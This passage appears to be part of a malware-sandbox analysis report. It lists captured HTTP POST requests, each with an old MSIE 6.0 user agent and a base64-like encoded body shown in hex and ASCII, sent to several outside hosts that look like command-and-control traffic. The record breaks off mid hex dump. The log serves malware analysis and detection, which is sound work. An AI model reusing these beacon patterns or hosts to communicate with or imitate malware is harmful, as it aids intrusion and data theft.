foJqUdsJ4ocqGRhS8rU5KcRc+wthKTJBPyFo9OfZeOtmo8XnKPSqpczxOeLyOoJBY3VidqdqvxyUBgLymtySCNp9YMu9npDMBCvZcFwrq08aH0Mh/4cmkdHscA/2VgmHPJc0NlKMmP8GERI0JPD0ITSPLzlrt0KsOcvcoBUDVulUaS8KLVjzlxQK7M4+OltIhSgZIXtLKSQtiQs4krfm9p1xrCsSMLKRuck9KNqNSmcAp+rC/k8OzmbmFBGUQqoaMmS3wKBoTBBTfQoq63yEdwSNS/bQTy/RcV0c+yBQSrDZqoZSxEANl0v1YN6REJNFpuS7yY1BF+O+7L6YUD27xGWdI1BoLcxZiQUcLkS0bOTh79tNp7wKHKVEfcfNVOcCRwBU3wuRdR3KqrhUIjWli5VNWu3TkigKzmrS50JUaY+gg2+OyMAfHvzlQ/kqJWgzahOGfPNdCEcUVg8VnQKz6py0AQKATloS2MpBgfXh3PZiCq/b4zIaKTHgGJJblwLqve3v/p4eCuo+0mzFXavPVtWcAOE7L3saG9X1dDPKJs4GWE5CCrNhrcTEF192Zw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 37 4f 6d 34 68 4b 45 45 37 49 64 64 75 6e 43 44 41 46 58 38 6f 48 6f 52 41 55 36 66 6d 6b 4b 48 5a 5a 33 75 65 46 39 47 73 45 6b 58 77 48 74 41 74 68 4f 54 51 32 30 6a 77 6f 51 76 55 42 34 78 75 49 43 71 78 6d 59 45 59 50 47 50 31 6f 4f 6b 59 32 76 4f 62 78 66 65 49 59 4f 75 42 35 58 6a 74 66 72 6b 54 70 6b 59 35 70 59 35 7a 6a 58 6e 65 42 4f 44 51 46 58 33 4f 79 57 50 71 4b 7a 38 4b 47 79 6d 36 41 2b 36 44 78 41 6c 36 35 46 34 6a 41 74 4c 77 43 44 4b 77 2f 76 4f 76 4c 4d 49 63 52 52 45 4e 6e 30 44 69 65 49 48 6b 6d 78 51 55 62 7a 55 6b 37 2b 35 31 49 66 59 72 77 42 47 78 54 73 69 66 34 58 6d 2f 32 2b 79 41 78 63 5a 50 33 6b 48 7a 6e 56 34 6a 4e 6d 49 74 69 35 62 58 30 36 35 46 63 53 2f 46 33 67 4d 54 53 73 4d 57 4a 55 4b 69 4d 50 72 52 59 6d 6e 4e 68 59 35 30 61 53 38 74 34 50 76 69 72 77 66 56 43 4a 47 79 56 30 59 54 46 52 6d 49 6b 6d 54 55 58 35 6f 74 32 6d 66 46 69 47 4c 6a 45 4e 6c 30 41 66 71 41 4a 33 50 64 56 78 63 4a 74 36 77 46 4f 38 71 56 50 4a 39 7a 77 36 4a 52 6b 4a 6b 4d 43 72 42 69 36 6c 4c 6b 75 6d 71 59 6f 61 70 34 36 4f 53 73 72 79 51 6e 6c 6e 39 72 35 42 74 41 57 45 2b 4d 5a 35 49 42 77 70 6b 74 2f 78 50 59 2f 75 72 54 58 47 72 49 4b 52 62 37 6e 49 79 6a 74 4e 6c 6e 6b 68 49 51 6c 51 57 39 54 70 67 6d 51 72 58 2b 50 55 74 64 2f 53 45 79 43 4c 38 42 67 4e 64 43 6e 4a 48 61 48 51 71 32 57 5a 34 47 46 38 33 6b 4a 4b 58 62 49 69 79 61 35 50 4b 37 78 53 6d 32 4f 56 50 6d 65 6c 71 78 35 42 67 55 6d 43 56 53 78 75 62 5a 6d 76 38 45 56 77 34 4c 32 57 34 39 2b 69 48 4a 52 2f 38 47 72 49 74 70 77 37 6b 61 73 44 70 47 69 49 55 55 33 34 7a 51 6c 48 6a 6f 72 63 42 51 44 53 62 5a 41 34 50 6d 51 6e 77 65 6e 6a 31 45 76 5a 58 54 48 2f 68 32 46 32 50 56 64 47 50 79 58 64 4d 48 49 4d 3d Data Ascii: 7Om4hKEE7IddunCDAFX8oHoRAU6fmkKHZZ3ueF9GsEkXwHtAthOTQ20jwoQvUB4xuICqxmYEYPGP1oOkY2vObxfeIYOuB5XjtfrkTpkY5pY5zjXneBODQFX3OyWPqKz8KGym6A+6DxAl65F4jAtLwCDKw/vOvLMIcRRENn0DieIHkmxQUbzUk7+51IfYrwBGxTsif4Xm/2+yAxcZP3kHznV4jNmIti5bX065FcS/F3gMTSsMWJUKiMPrRYmnNhY50aS8t4PvirwfVCJGyV0YTFRmIkmTUX5ot2mfFiGLjENl0AfqAJ3PdVxcJt6wFO8qVPJ9zw6JRkJkMCrBi6lLkumqYoap46OSsryQnln9r5BtAWE+MZ5IBwpkt/xPY/urTXGrIKRb7nIyjtNlnkhIQlQW9TpgmQrX+PUtd/SEyCL8BgNdCnJHaHQq2WZ4GF83kJKXbIiya5PK7xSm2OVPmelqx5BgUmCVSxubZmv8EVw4L2W49+iHJR/8GrItpw7kasDpGiIUU34zQlHjorcBQDSbZA4PmQnwenj1EvZXTH/h2F2PVdGPyXdMHIM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 37 4f 6d 34 68 4b 45 45 37 49 64 64 75 6e 43 44 41 46 58 38 6f 48 6f 52 41 55 36 66 6d 6b 4b 48 5a 5a 33 75 65 46 39 47 73 45 6b 58 77 48 74 41 74 68 4f 54 51 32 30 6a 77 6f 51 76 55 42 34 78 75 49 43 71 78 6d 59 45 59 50 47 50 31 6f 4f 6b 59 32 76 4f 62 78 66 65 49 59 4f 75 42 35 58 6a 74 66 72 6b 54 70 6b 59 35 70 59 35 7a 6a 58 6e 65 42 4f 44 51 46 58 33 4f 79 57 50 71 4b 7a 38 4b 47 79 6d 36 41 2b 36 44 78 41 6c 36 35 46 34 6a 41 74 4c 77 43 44 4b 77 2f 76 4f 76 4c 4d 49 63 52 52 45 4e 6e 30 44 69 65 49 48 6b 6d 78 51 55 62 7a 55 6b 37 2b 35 31 49 66 59 72 77 42 47 78 54 73 69 66 34 58 6d 2f 32 2b 79 41 78 63 5a 50 33 6b 48 7a 6e 56 34 6a 4e 6d 49 74 69 35 62 58 30 36 35 46 63 53 2f 46 33 67 4d 54 53 73 4d 57 4a 55 4b 69 4d 50 72 52 59 6d 6e 4e 68 59 35 30 61 53 38 74 34 50 76 69 72 77 66 56 43 4a 47 79 56 30 59 54 46 52 6d 49 6b 6d 54 55 58 35 6f 74 32 6d 66 46 69 47 4c 6a 45 4e 6c 30 41 66 71 41 4a 33 50 64 56 78 63 4a 74 36 77 46 4f 38 71 56 50 4a 39 7a 77 36 4a 52 6b 4a 6b 4d 43 72 42 69 36 6c 4c 6b 75 6d 71 59 6f 61 70 34 36 4f 53 73 72 79 51 6e 6c 6e 39 72 35 42 74 41 57 45 2b 4d 5a 35 49 42 77 70 6b 74 2f 78 50 59 2f 75 72 54 58 47 72 49 4b 52 62 37 6e 49 79 6a 74 4e 6c 6e 6b 68 49 51 6c 51 57 39 54 70 67 6d 51 72 58 2b 50 55 74 64 2f 53 45 79 43 4c 38 42 67 4e 64 43 6e 4a 48 61 48 51 71 32 57 5a 34 47 46 38 33 6b 4a 4b 58 62 49 69 79 61 35 50 4b 37 78 53 6d 32 4f 56 50 6d 65 6c 71 78 35 42 67 55 6d 43 56 53 78 75 62 5a 6d 76 38 45 56 77 34 4c 32 57 34 39 2b 69 48 4a 52 2f 38 47 72 49 74 70 77 37 6b 61 73 44 70 47 69 49 55 55 33 34 7a 51 6c 48 6a 6f 72 63 42 51 44 53 62 5a 41 34 50 6d 51 6e 77 65 6e 6a 31 45 76 5a 58 54 48 2f 68 32 46 32 50 56 64 47 50 79 58 64 4d 48 49 4d 3d Data Ascii: 7Om4hKEE7IddunCDAFX8oHoRAU6fmkKHZZ3ueF9GsEkXwHtAthOTQ20jwoQvUB4xuICqxmYEYPGP1oOkY2vObxfeIYOuB5XjtfrkTpkY5pY5zjXneBODQFX3OyWPqKz8KGym6A+6DxAl65F4jAtLwCDKw/vOvLMIcRRENn0DieIHkmxQUbzUk7+51IfYrwBGxTsif4Xm/2+yAxcZP3kHznV4jNmIti5bX065FcS/F3gMTSsMWJUKiMPrRYmnNhY50aS8t4PvirwfVCJGyV0YTFRmIkmTUX5ot2mfFiGLjENl0AfqAJ3PdVxcJt6wFO8qVPJ9zw6JRkJkMCrBi6lLkumqYoap46OSsryQnln9r5BtAWE+MZ5IBwpkt/xPY/urTXGrIKRb7nIyjtNlnkhIQlQW9TpgmQrX+PUtd/SEyCL8BgNdCnJHaHQq2WZ4GF83kJKXbIiya5PK7xSm2OVPmelqx5BgUmCVSxubZmv8EVw4L2W49+iHJR/8GrItpw7kasDpGiIUU34zQlHjorcBQDSbZA4PmQnwenj1EvZXTH/h2F2PVdGPyXdMHIM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 30 6f 43 41 4b 6b 6f 48 41 6f 69 64 48 31 35 37 72 63 36 71 71 51 32 54 64 51 6e 36 63 46 36 35 48 70 36 74 6c 4e 47 4a 74 4a 53 51 66 79 6e 32 53 30 4e 44 35 38 70 6d 77 64 79 2f 46 63 44 75 47 7a 5a 34 30 59 62 54 67 54 69 34 39 33 6c 50 6d 42 2b 55 7a 7a 6e 75 65 67 5a 70 49 34 46 79 4c 42 4e 63 34 5a 41 46 56 42 43 46 4e 78 78 64 74 5a 57 65 4b 55 4a 79 75 73 43 6e 65 61 58 46 69 51 51 62 62 73 70 49 6c 7a 33 51 4b 76 79 56 62 41 72 71 4f 65 76 76 31 4b 45 4a 4c 32 6a 55 7a 76 62 42 4c 58 38 34 7a 61 6f 31 59 48 4f 58 37 70 52 78 2b 46 57 62 62 36 33 53 75 45 6a 58 44 44 6e 59 66 64 2f 6e 54 61 4e 66 4b 72 67 6c 50 35 52 45 58 6f 6d 71 76 62 35 79 32 6c 37 4f 51 4f 4c 4b 44 54 66 71 43 58 46 53 62 62 73 75 59 39 62 74 63 41 42 6c 77 33 30 34 4c 70 72 78 6f 6b 70 39 6c 46 63 38 70 63 44 69 50 48 35 66 55 6b 5a 73 4d 49 67 34 71 50 38 72 44 58 79 62 64 47 47 6a 48 56 54 69 56 44 31 7a 57 5a 42 4c 44 69 4a 78 55 73 55 76 61 6c 62 2f 77 5a 4e 61 65 2f 44 42 36 38 2f 59 39 4b 57 43 46 4f 6c 53 49 53 31 63 64 44 51 53 2b 30 64 73 47 74 67 37 55 72 56 66 73 72 5a 33 56 32 79 52 38 45 50 37 65 2f 71 62 4a 61 47 54 45 63 50 7a 6d 57 62 7a 41 38 33 6d 51 4b 33 55 4c 31 59 79 52 68 4f 48 30 53 4a 2b 78 33 6f 52 30 48 4d 75 48 37 55 48 38 37 4e 37 76 49 4f 74 71 48 2f 35 59 4b 68 33 53 46 75 5a 65 7a 75 73 34 6c 65 75 6f 46 6f 48 31 38 43 4f 57 62 32 4e 38 30 48 38 67 30 72 6a 61 62 6b 37 6b 53 55 5a 6d 41 4f 6e 61 73 75 78 30 69 63 76 57 49 75 70 75 69 49 47 70 5a 79 47 44 48 51 6a 69 74 72 6a 67 56 78 53 55 31 38 38 6c 32 70 35 4c 59 74 76 47 35 6a 4f 6a 76 4c 65 49 74 31 75 38 5a 66 74 43 2f 35 4c 36 71 46 51 4f 34 73 73 Data Ascii: 0oCAKkoHAoidH157rc6qqQ2TdQn6cF65Hp6tlNGJtJSQfyn2S0ND58pmwdy/FcDuGzZ40YbTgTi493lPmB+UzznuegZpI4FyLBNc4ZAFVBCFNxxdtZWeKUJyusCneaXFiQQbbspIlz3QKvyVbArqOevv1KEJL2jUzvbBLX84zao1YHOX7pRx+FWbb63SuEjXDDnYfd/nTaNfKrglP5REXomqvb5y2l7OQOLKDTfqCXFSbbsuY9btcABlw304Lprxokp9lFc8pcDiPH5fUkZsMIg4qP8rDXybdGGjHVTiVD1zWZBLDiJxUsUvalb/wZNae/DB68/Y9KWCFOlSIS1cdDQS+0dsGtg7UrVfsrZ3V2yR8EP7e/qbJaGTEcPzmWbzA83mQK3UL1YyRhOH0SJ+x3oR0HMuH7UH87N7vIOtqH/5YKh3SFuZezus4leuoFoH18COWb2N80H8g0rjabk7kSUZmAOnasux0icvWIupuiIGpZyGDHQjitrjgVxSU188l2p5LYtvG5jOjvLeIt1u8ZftC/5L6qFQO4ss
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 6d 51 56 67 71 50 39 74 44 6f 68 2b 33 49 73 72 33 69 50 6c 6f 6f 68 6f 4a 6b 46 56 6d 6a 56 42 6f 78 33 74 74 47 57 43 62 41 33 4d 48 50 51 36 72 50 76 6e 2b 6a 55 43 72 45 54 38 78 32 4a 35 56 63 44 66 7a 4c 57 69 59 48 77 55 59 52 77 7a 78 75 79 6a 6c 7a 6e 44 42 48 61 2b 49 4c 44 75 74 2f 4a 51 42 77 38 36 2b 4d 33 61 72 43 44 30 73 39 73 33 58 50 32 6e 64 31 44 50 70 59 65 73 55 7a 77 65 33 43 58 77 6e 76 6d 67 64 67 35 32 66 34 78 43 36 31 57 51 39 6e 36 45 67 4f 36 33 68 63 6d 51 4a 4d 4b 6c 58 50 53 66 6c 63 4c 4a 7a 4f 6c 4c 61 44 70 32 76 34 4d 39 70 61 69 4f 4c 35 49 48 56 77 44 76 78 4d 39 34 48 53 78 4d 4f 57 5a 4a 7a 39 38 2b 49 2b 33 4b 2b 32 2f 5a 58 30 7a 6c 57 67 54 56 41 2f 43 67 49 52 43 53 31 52 6f 4f 69 2b 64 48 58 6b 67 58 45 42 76 77 55 4d 58 6e 6d 67 70 4c 62 47 2f 44 49 37 2f 53 38 51 54 50 67 46 56 61 34 70 70 52 66 78 50 4e 6c 66 41 66 74 43 39 46 5a 6f 6b 78 38 36 79 55 33 32 6a 68 4f 4f 2f 38 63 54 41 63 5a 5a 43 6e 67 68 79 56 6a 54 7a 55 75 30 5a 72 4f 35 4d 4a 34 32 34 51 47 2f 58 77 65 46 75 31 59 52 36 6c 57 36 79 58 72 69 41 34 47 30 42 52 44 63 6b 62 63 45 74 62 37 53 65 6f 46 74 64 46 41 48 41 5a 4a 6a 4d 53 68 41 68 39 37 4d 34 72 63 59 70 38 71 74 43 59 76 7a 56 4e 45 65 74 52 45 49 44 4f 6b 75 66 65 71 47 52 39 39 4a 33 53 55 54 4c 39 48 4f 32 31 64 6a 4d 63 51 67 35 6e 36 2b 6b 45 4b 31 33 38 6e 6d 4a 6c 65 54 50 75 69 4f 65 4b 61 37 57 42 4f 67 7a 37 72 4f 4a 6f 45 2b 69 49 4b 61 2f 69 39 63 45 48 6f 43 4b 6b 50 30 70 59 39 57 35 65 41 6f 36 58 51 57 79 5a 76 31 30 65 39 31 4e 68 41 34 38 32 4e 71 34 76 4c 54 62 55 59 65 6a 43 39 70 71 6a 66 36 73 31 58 6f 69 4d 4d 5a 36 36 4c 2f 51 32 33 6e 67 33 54 78 55 70 4c 4c 63 63 31 57 55 7a 77 67 44 37 2b 51 50 38 71 67 42 70 61 56 4d 64 41 67 61 73 46 6c 63 49 31 6f 73 3d Data Ascii: mQVgqP9tDoh+3Isr3iPloohoJkFVmjVBox3ttGWCbA3MHPQ6rPvn+jUCrET8x2J5VcDfzLWiYHwUYRwzxuyjlznDBHa+ILDut/JQBw86+M3arCD0s9s3XP2nd1DPpYesUzwe3CXwnvmgdg52f4xC61WQ9n6EgO63hcmQJMKlXPSflcLJzOlLaDp2v4M9paiOL5IHVwDvxM94HSxMOWZJz98+I+3K+2/ZX0zlWgTVA/CgIRCS1RoOi+dHXkgXEBvwUMXnmgpLbG/DI7/S8QTPgFVa4ppRfxPNlfAftC9FZokx86yU32jhOO/8cTAcZZCnghyVjTzUu0ZrO5MJ424QG/XweFu1YR6lW6yXriA4G0BRDckbcEtb7SeoFtdFAHAZJjMShAh97M4rcYp8qtCYvzVNEetREIDOkufeqGR99J3SUTL9HO21djMcQg5n6+kEK138nmJleTPuiOeKa7WBOgz7rOJoE+iIKa/i9cEHoCKkP0pY9W5eAo6XQWyZv10e91NhA482Nq4vLTbUYejC9pqjf6s1XoiMMZ66L/Q23ng3TxUpLLcc1WUzwgD7+QP8qgBpaVMdAgasFlcI1os=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 52 42 38 61 76 74 70 79 46 34 68 32 52 64 61 35 2f 61 53 73 74 42 31 52 77 55 48 4b 4f 78 6d 34 72 72 4c 75 32 77 53 45 56 47 41 62 2f 45 54 47 2f 58 73 37 34 55 33 33 7a 54 4c 61 31 4f 70 75 56 77 78 6c 55 44 77 55 75 47 73 4d 33 4e 43 4a 4c 72 71 6b 4a 38 74 35 65 36 36 49 6b 6e 4e 70 76 35 76 66 65 4e 42 2f 2b 32 30 4a 43 4e 39 6d 64 67 59 67 48 69 71 52 65 35 47 53 4e 37 73 31 55 34 4b 31 52 67 74 66 35 66 2f 4c 41 4e 31 51 7a 5a 79 30 77 46 56 32 36 46 31 45 6e 53 59 7a 56 38 46 36 77 6a 33 48 6c 34 63 4a 75 65 35 76 51 72 6f 4f 41 6e 58 59 79 57 5a 44 2f 52 59 6b 76 39 45 47 47 6f 61 56 4b 51 63 41 61 38 65 57 36 37 73 75 70 61 41 69 48 30 46 2f 52 6e 6d 46 4b 34 2b 53 45 71 43 6c 7a 53 74 6a 33 6f 4d 69 70 56 6c 49 53 30 4b 6a 57 56 41 66 55 39 31 76 73 4e 38 52 66 73 5a 50 69 32 64 34 4b 78 66 2b 58 68 4d 6c 76 72 63 33 43 56 61 6e 4a 53 65 77 76 67 71 39 6e 4c 50 41 36 58 56 7a 51 32 4f 6d 30 49 31 42 35 51 2b 6e 53 77 75 37 4a 57 6e 63 4d 4a 70 44 5a 4d 45 38 71 34 64 45 64 47 6d 78 5a 6d 47 2f 76 48 42 69 62 7a 50 75 6b 33 64 39 61 53 4c 59 6d 66 6d 47 71 72 64 4c 41 6e 32 39 6b 41 7a 53 5a 58 4a 47 42 58 41 6e 52 4c 6f 47 41 66 79 4c 6e 55 7a 48 39 70 4d 62 65 6a 31 55 47 46 56 38 4b 4e 44 75 55 58 2f 73 2b 63 66 6b 45 43 79 64 53 37 64 32 61 44 4f 58 64 35 38 30 4a 61 6c 53 57 51 61 6b 39 4d 57 30 52 67 46 67 63 6e 73 30 6c 73 67 57 74 44 73 4a 6c 75 7a 42 59 31 57 5a 61 36 51 67 5a 75 30 5a 4d 52 6b 72 6f 49 63 4f 58 74 2f 2b 6a 36 43 36 76 64 68 4a 4e 52 41 41 2f 41 35 5a 64 50 72 59 68 6b 34 54 31 36 55 62 62 77 41 4f 42 74 4f 54 4d 4f 46 4f 52 4d 79 52 57 75 55 50 42 41 4f 45 68 45 32 68 55 35 34 3d Data Ascii: RB8avtpyF4h2Rda5/aSstB1RwUHKOxm4rrLu2wSEVGAb/ETG/Xs74U33zTLa1OpuVwxlUDwUuGsM3NCJLrqkJ8t5e66IknNpv5vfeNB/+20JCN9mdgYgHiqRe5GSN7s1U4K1Rgtf5f/LAN1QzZy0wFV26F1EnSYzV8F6wj3Hl4cJue5vQroOAnXYyWZD/RYkv9EGGoaVKQcAa8eW67supaAiH0F/RnmFK4+SEqClzStj3oMipVlIS0KjWVAfU91vsN8RfsZPi2d4Kxf+XhMlvrc3CVanJSewvgq9nLPA6XVzQ2Om0I1B5Q+nSwu7JWncMJpDZME8q4dEdGmxZmG/vHBibzPuk3d9aSLYmfmGqrdLAn29kAzSZXJGBXAnRLoGAfyLnUzH9pMbej1UGFV8KNDuUX/s+cfkECydS7d2aDOXd580JalSWQak9MW0RgFgcns0lsgWtDsJluzBY1WZa6QgZu0ZMRkroIcOXt/+j6C6vdhJNRAA/A5ZdPrYhk4T16UbbwAOBtOTMOFORMyRWuUPBAOEhE2hU54=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheData Raw: 71 55 4e 53 64 34 74 6a 73 59 63 67 62 54 4d 43 34 6d 4f 74 68 76 54 52 6d 4e 37 52 50 4a 49 68 37 34 58 34 68 6a 72 6c 79 65 4d 34 74 5a 53 64 55 58 58 53 4e 53 72 6b 47 34 6d 63 53 50 2f 66 75 76 79 55 38 64 72 72 58 44 57 45 6a 4e 77 4e 46 75 67 6b 31 66 68 42 78 34 49 6c 56 63 2b 49 37 2b 79 55 46 73 76 4c 66 45 39 6f 66 45 33 6a 55 65 77 74 41 48 70 57 64 6f 66 4e 34 61 37 36 72 41 59 63 77 47 67 6f 45 4a 79 44 41 59 73 47 58 75 36 4b 33 55 6e 47 4a 6f 43 6a 49 4f 34 5a 62 75 72 4d 64 6c 51 42 37 35 44 69 71 51 68 69 79 4b 4c 61 43 72 64 4e 4f 59 6c 39 31 4b 74 54 59 4c 6b 73 62 32 75 53 30 73 53 66 72 64 7a 6c 54 36 59 58 56 4a 54 71 6e 43 45 51 31 34 4d 75 6e 30 68 4e 6c 6c 65 6d 55 47 37 68 45 48 55 67 35 52 59 33 2f 33 45 37 55 43 47 52 30 74 71 44 63 68 73 41 4f 47 39 4f 4f 4e 55 4e 66 37 49 55 55 31 68 6d 35 58 6d 59 69 78 6e 75 32 58 6b 69 55 46 75 6a 68 76 50 6c 62 68 51 54 73 56 45 69 33 72 41 76 52 72 65 2f 2b 67 65 5a 6e 76 59 35 42 74 36 45 44 63 36 66 6d 59 74 4b 32 38 34 4a 74 53 79 4e 49 6b 31 6d 4c 61 78 32 56 4e 5a 54 4d 76 75 61 30 46 65 63 7a 75 37 71 54 32 63 4d 53 36 45 63 65 68 6d 2f 77 67 61 33 4a 6a 32 30 54 2b 4c 31 47 6b 6a 2b 44 37 44 6e 52 75 47 4c 72 61 50 6d 66 48 6e 77 71 31 71 33 61 63 4b 4c 56 5a 6a 6a 38 53 30 61 57 70 62 74 34 64 58 37 44 63 41 59 39 6f 42 58 56 79 47 4e 47 73 38 2b 6c 33 65 79 34 39 63 76 30 4a 4a 4c 69 46 58 31 58 73 48 47 37 72 79 32 2f 69 68 78 42 39 51 2b 44 45 2b 47 56 63 4b 61 6b 6d 77 69 30 44 6e 33 74 45 66 37 77 6a 6b 2f 76 64 77 6f 62 43 34 78 39 36 45 48 6f 38 6c 4b 59 4d 32 41 53 47 50 31 69 6f 32 39 32 67 42 49 33 58 6e 6f 68 61 38 58 4a 68 4c 52 41 51 3d 3d Data Ascii: qUNSd4tjsYcgbTMC4mOthvTRmN7RPJIh74X4hjrlyeM4tZSdUXXSNSrkG4mcSP/fuvyU8drrXDWEjNwNFugk1fhBx4IlVc+I7+yUFsvLfE9ofE3jUewtAHpWdofN4a76rAYcwGgoEJyDAYsGXu6K3UnGJoCjIO4ZburMdlQB75DiqQhiyKLaCrdNOYl91KtTYLksb2uS0sSfrdzlT6YXVJTqnCEQ14Mun0hNllemUG7hEHUg5RY3/3E7UCGR0tqDchsAOG9OONUNf7IUU1hm5XmYixnu2XkiUFujhvPlbhQTsVEi3rAvRre/+geZnvY5Bt6EDc6fmYtK284JtSyNIk1mLax2VNZTMvua0Feczu7qT2cMS6Ecehm/wga3Jj20T+L1Gkj+D7DnRuGLraPmfHnwq1q3acKLVZjj8S0aWpbt4dX7DcAY9oBXVyGNGs8+l3ey49cv0JJLiFX1XsHG7ry2/ihxB9Q+DE+GVcKakmwi0Dn3tEf7wjk/vdwobC4x96EHo8lKYM2ASGP1io292gBI3Xnoha8XJhLRAQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 59 34 43 2b 59 74 49 62 4a 59 67 4a 77 71 46 6f 68 51 6e 70 70 74 58 38 76 6e 45 69 4e 46 37 2f 4a 6a 64 61 7a 43 49 6b 68 48 2f 45 56 56 6b 5a 50 58 30 41 35 45 5a 36 78 52 49 57 46 61 56 56 52 5a 65 4d 42 74 44 76 38 33 71 59 78 34 78 6f 78 34 76 6a 39 37 70 42 45 4d 55 47 56 54 51 49 67 73 2f 42 32 33 61 71 2b 62 35 64 51 35 4e 62 4b 4c 7a 65 56 4a 78 65 76 35 4b 30 53 71 53 76 5a 31 45 41 52 39 6f 6c 57 54 4d 69 33 52 67 35 78 73 6d 47 71 35 51 54 6a 32 66 66 53 68 32 4b 6e 74 74 73 4d 51 46 4a 69 53 2b 6e 78 41 74 6d 2b 75 79 69 78 4c 4c 37 75 31 6f 2b 5a 56 53 52 64 69 63 51 2f 38 44 5a 31 38 71 78 78 46 66 79 76 69 38 46 50 58 44 62 62 73 57 6a 4d 33 47 45 4d 4d 56 2b 54 6e 6a 54 54 32 71 36 59 70 45 78 52 57 54 70 36 6e 58 72 79 4f 76 66 4f 6e 6e 6d 70 43 75 78 4b 7a 47 6c 64 66 42 63 56 4f 6d 6b 4a 35 6e 57 77 71 61 75 79 6a 2f 78 4f 43 76 6b 54 38 70 54 32 51 61 38 7a 77 54 35 69 6d 4a 47 6c 31 2f 42 30 4a 52 45 45 79 31 31 50 70 5a 74 69 63 77 6e 38 71 6a 36 4f 4a 52 64 2f 4b 42 47 32 38 37 30 49 51 58 72 35 78 70 34 6d 72 50 62 6f 4a 76 50 42 77 7a 59 72 6b 43 55 72 77 4c 55 47 65 6f 35 6d 55 47 78 70 6d 32 38 70 33 54 50 53 55 63 55 75 6f 4d 4d 4b 44 65 76 70 65 43 6c 36 38 65 7a 55 64 2b 64 70 67 68 4e 56 38 6f 4b 73 4d 42 70 4c 79 54 64 32 72 77 56 34 45 76 6d 51 43 46 42 7a 34 66 6d 52 59 70 36 4a 59 4c 62 69 51 77 50 75 35 68 63 61 5a 51 79 65 63 6b 42 77 71 48 70 4f 36 49 72 4f 74 52 34 52 37 73 77 46 56 2f 71 2f 5a 76 48 43 79 6d 31 49 54 62 66 53 64 57 66 45 49 4a 45 75 72 67 4c 6a 7a 78 4c 77 41 70 75 62 2f 61 35 46 36 74 34 4a 5a 73 77 7a 2b 59 65 70 68 73 38 36 68 79 34 30 4f 31 34 44 51 75 51 61 54 41 7a 76 30 76 79 34 71 66 54 76 65 4e 49 66 51 6c 47 5a 7a 47 63 4e 75 6a 70 50 4c 4d 45 4c 47 39 43 36 67 36 4e 38 62 77 69 2f 76 42 57 4b 41 6f 3d Data Ascii: Y4C+YtIbJYgJwqFohQnpptX8vnEiNF7/JjdazCIkhH/EVVkZPX0A5EZ6xRIWFaVVRZeMBtDv83qYx4xox4vj97pBEMUGVTQIgs/B23aq+b5dQ5NbKLzeVJxev5K0SqSvZ1EAR9olWTMi3Rg5xsmGq5QTj2ffSh2KnttsMQFJiS+nxAtm+uyixLL7u1o+ZVSRdicQ/8DZ18qxxFfyvi8FPXDbbsWjM3GEMMV+TnjTT2q6YpExRWTp6nXryOvfOnnmpCuxKzGldfBcVOmkJ5nWwqauyj/xOCvkT8pT2Qa8zwT5imJGl1/B0JREEy11PpZticwn8qj6OJRd/KBG2870IQXr5xp4mrPboJvPBwzYrkCUrwLUGeo5mUGxpm28p3TPSUcUuoMMKDevpeCl68ezUd+dpghNV8oKsMBpLyTd2rwV4EvmQCFBz4fmRYp6JYLbiQwPu5hcaZQyeckBwqHpO6IrOtR4R7swFV/q/ZvHCym1ITbfSdWfEIJEurgLjzxLwApub/a5F6t4JZswz+Yephs86hy40O14DQuQaTAzv0vy4qfTveNIfQlGZzGcNujpPLMELG9C6g6N8bwi/vBWKAo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 59 34 43 2b 59 74 49 62 4a 59 67 4a 77 71 46 6f 68 51 6e 70 70 74 58 38 76 6e 45 69 4e 46 37 2f 4a 6a 64 61 7a 43 49 6b 68 48 2f 45 56 56 6b 5a 50 58 30 41 35 45 5a 36 78 52 49 57 46 61 56 56 52 5a 65 4d 42 74 44 76 38 33 71 59 78 34 78 6f 78 34 76 6a 39 37 70 42 45 4d 55 47 56 54 51 49 67 73 2f 42 32 33 61 71 2b 62 35 64 51 35 4e 62 4b 4c 7a 65 56 4a 78 65 76 35 4b 30 53 71 53 76 5a 31 45 41 52 39 6f 6c 57 54 4d 69 33 52 67 35 78 73 6d 47 71 35 51 54 6a 32 66 66 53 68 32 4b 6e 74 74 73 4d 51 46 4a 69 53 2b 6e 78 41 74 6d 2b 75 79 69 78 4c 4c 37 75 31 6f 2b 5a 56 53 52 64 69 63 51 2f 38 44 5a 31 38 71 78 78 46 66 79 76 69 38 46 50 58 44 62 62 73 57 6a 4d 33 47 45 4d 4d 56 2b 54 6e 6a 54 54 32 71 36 59 70 45 78 52 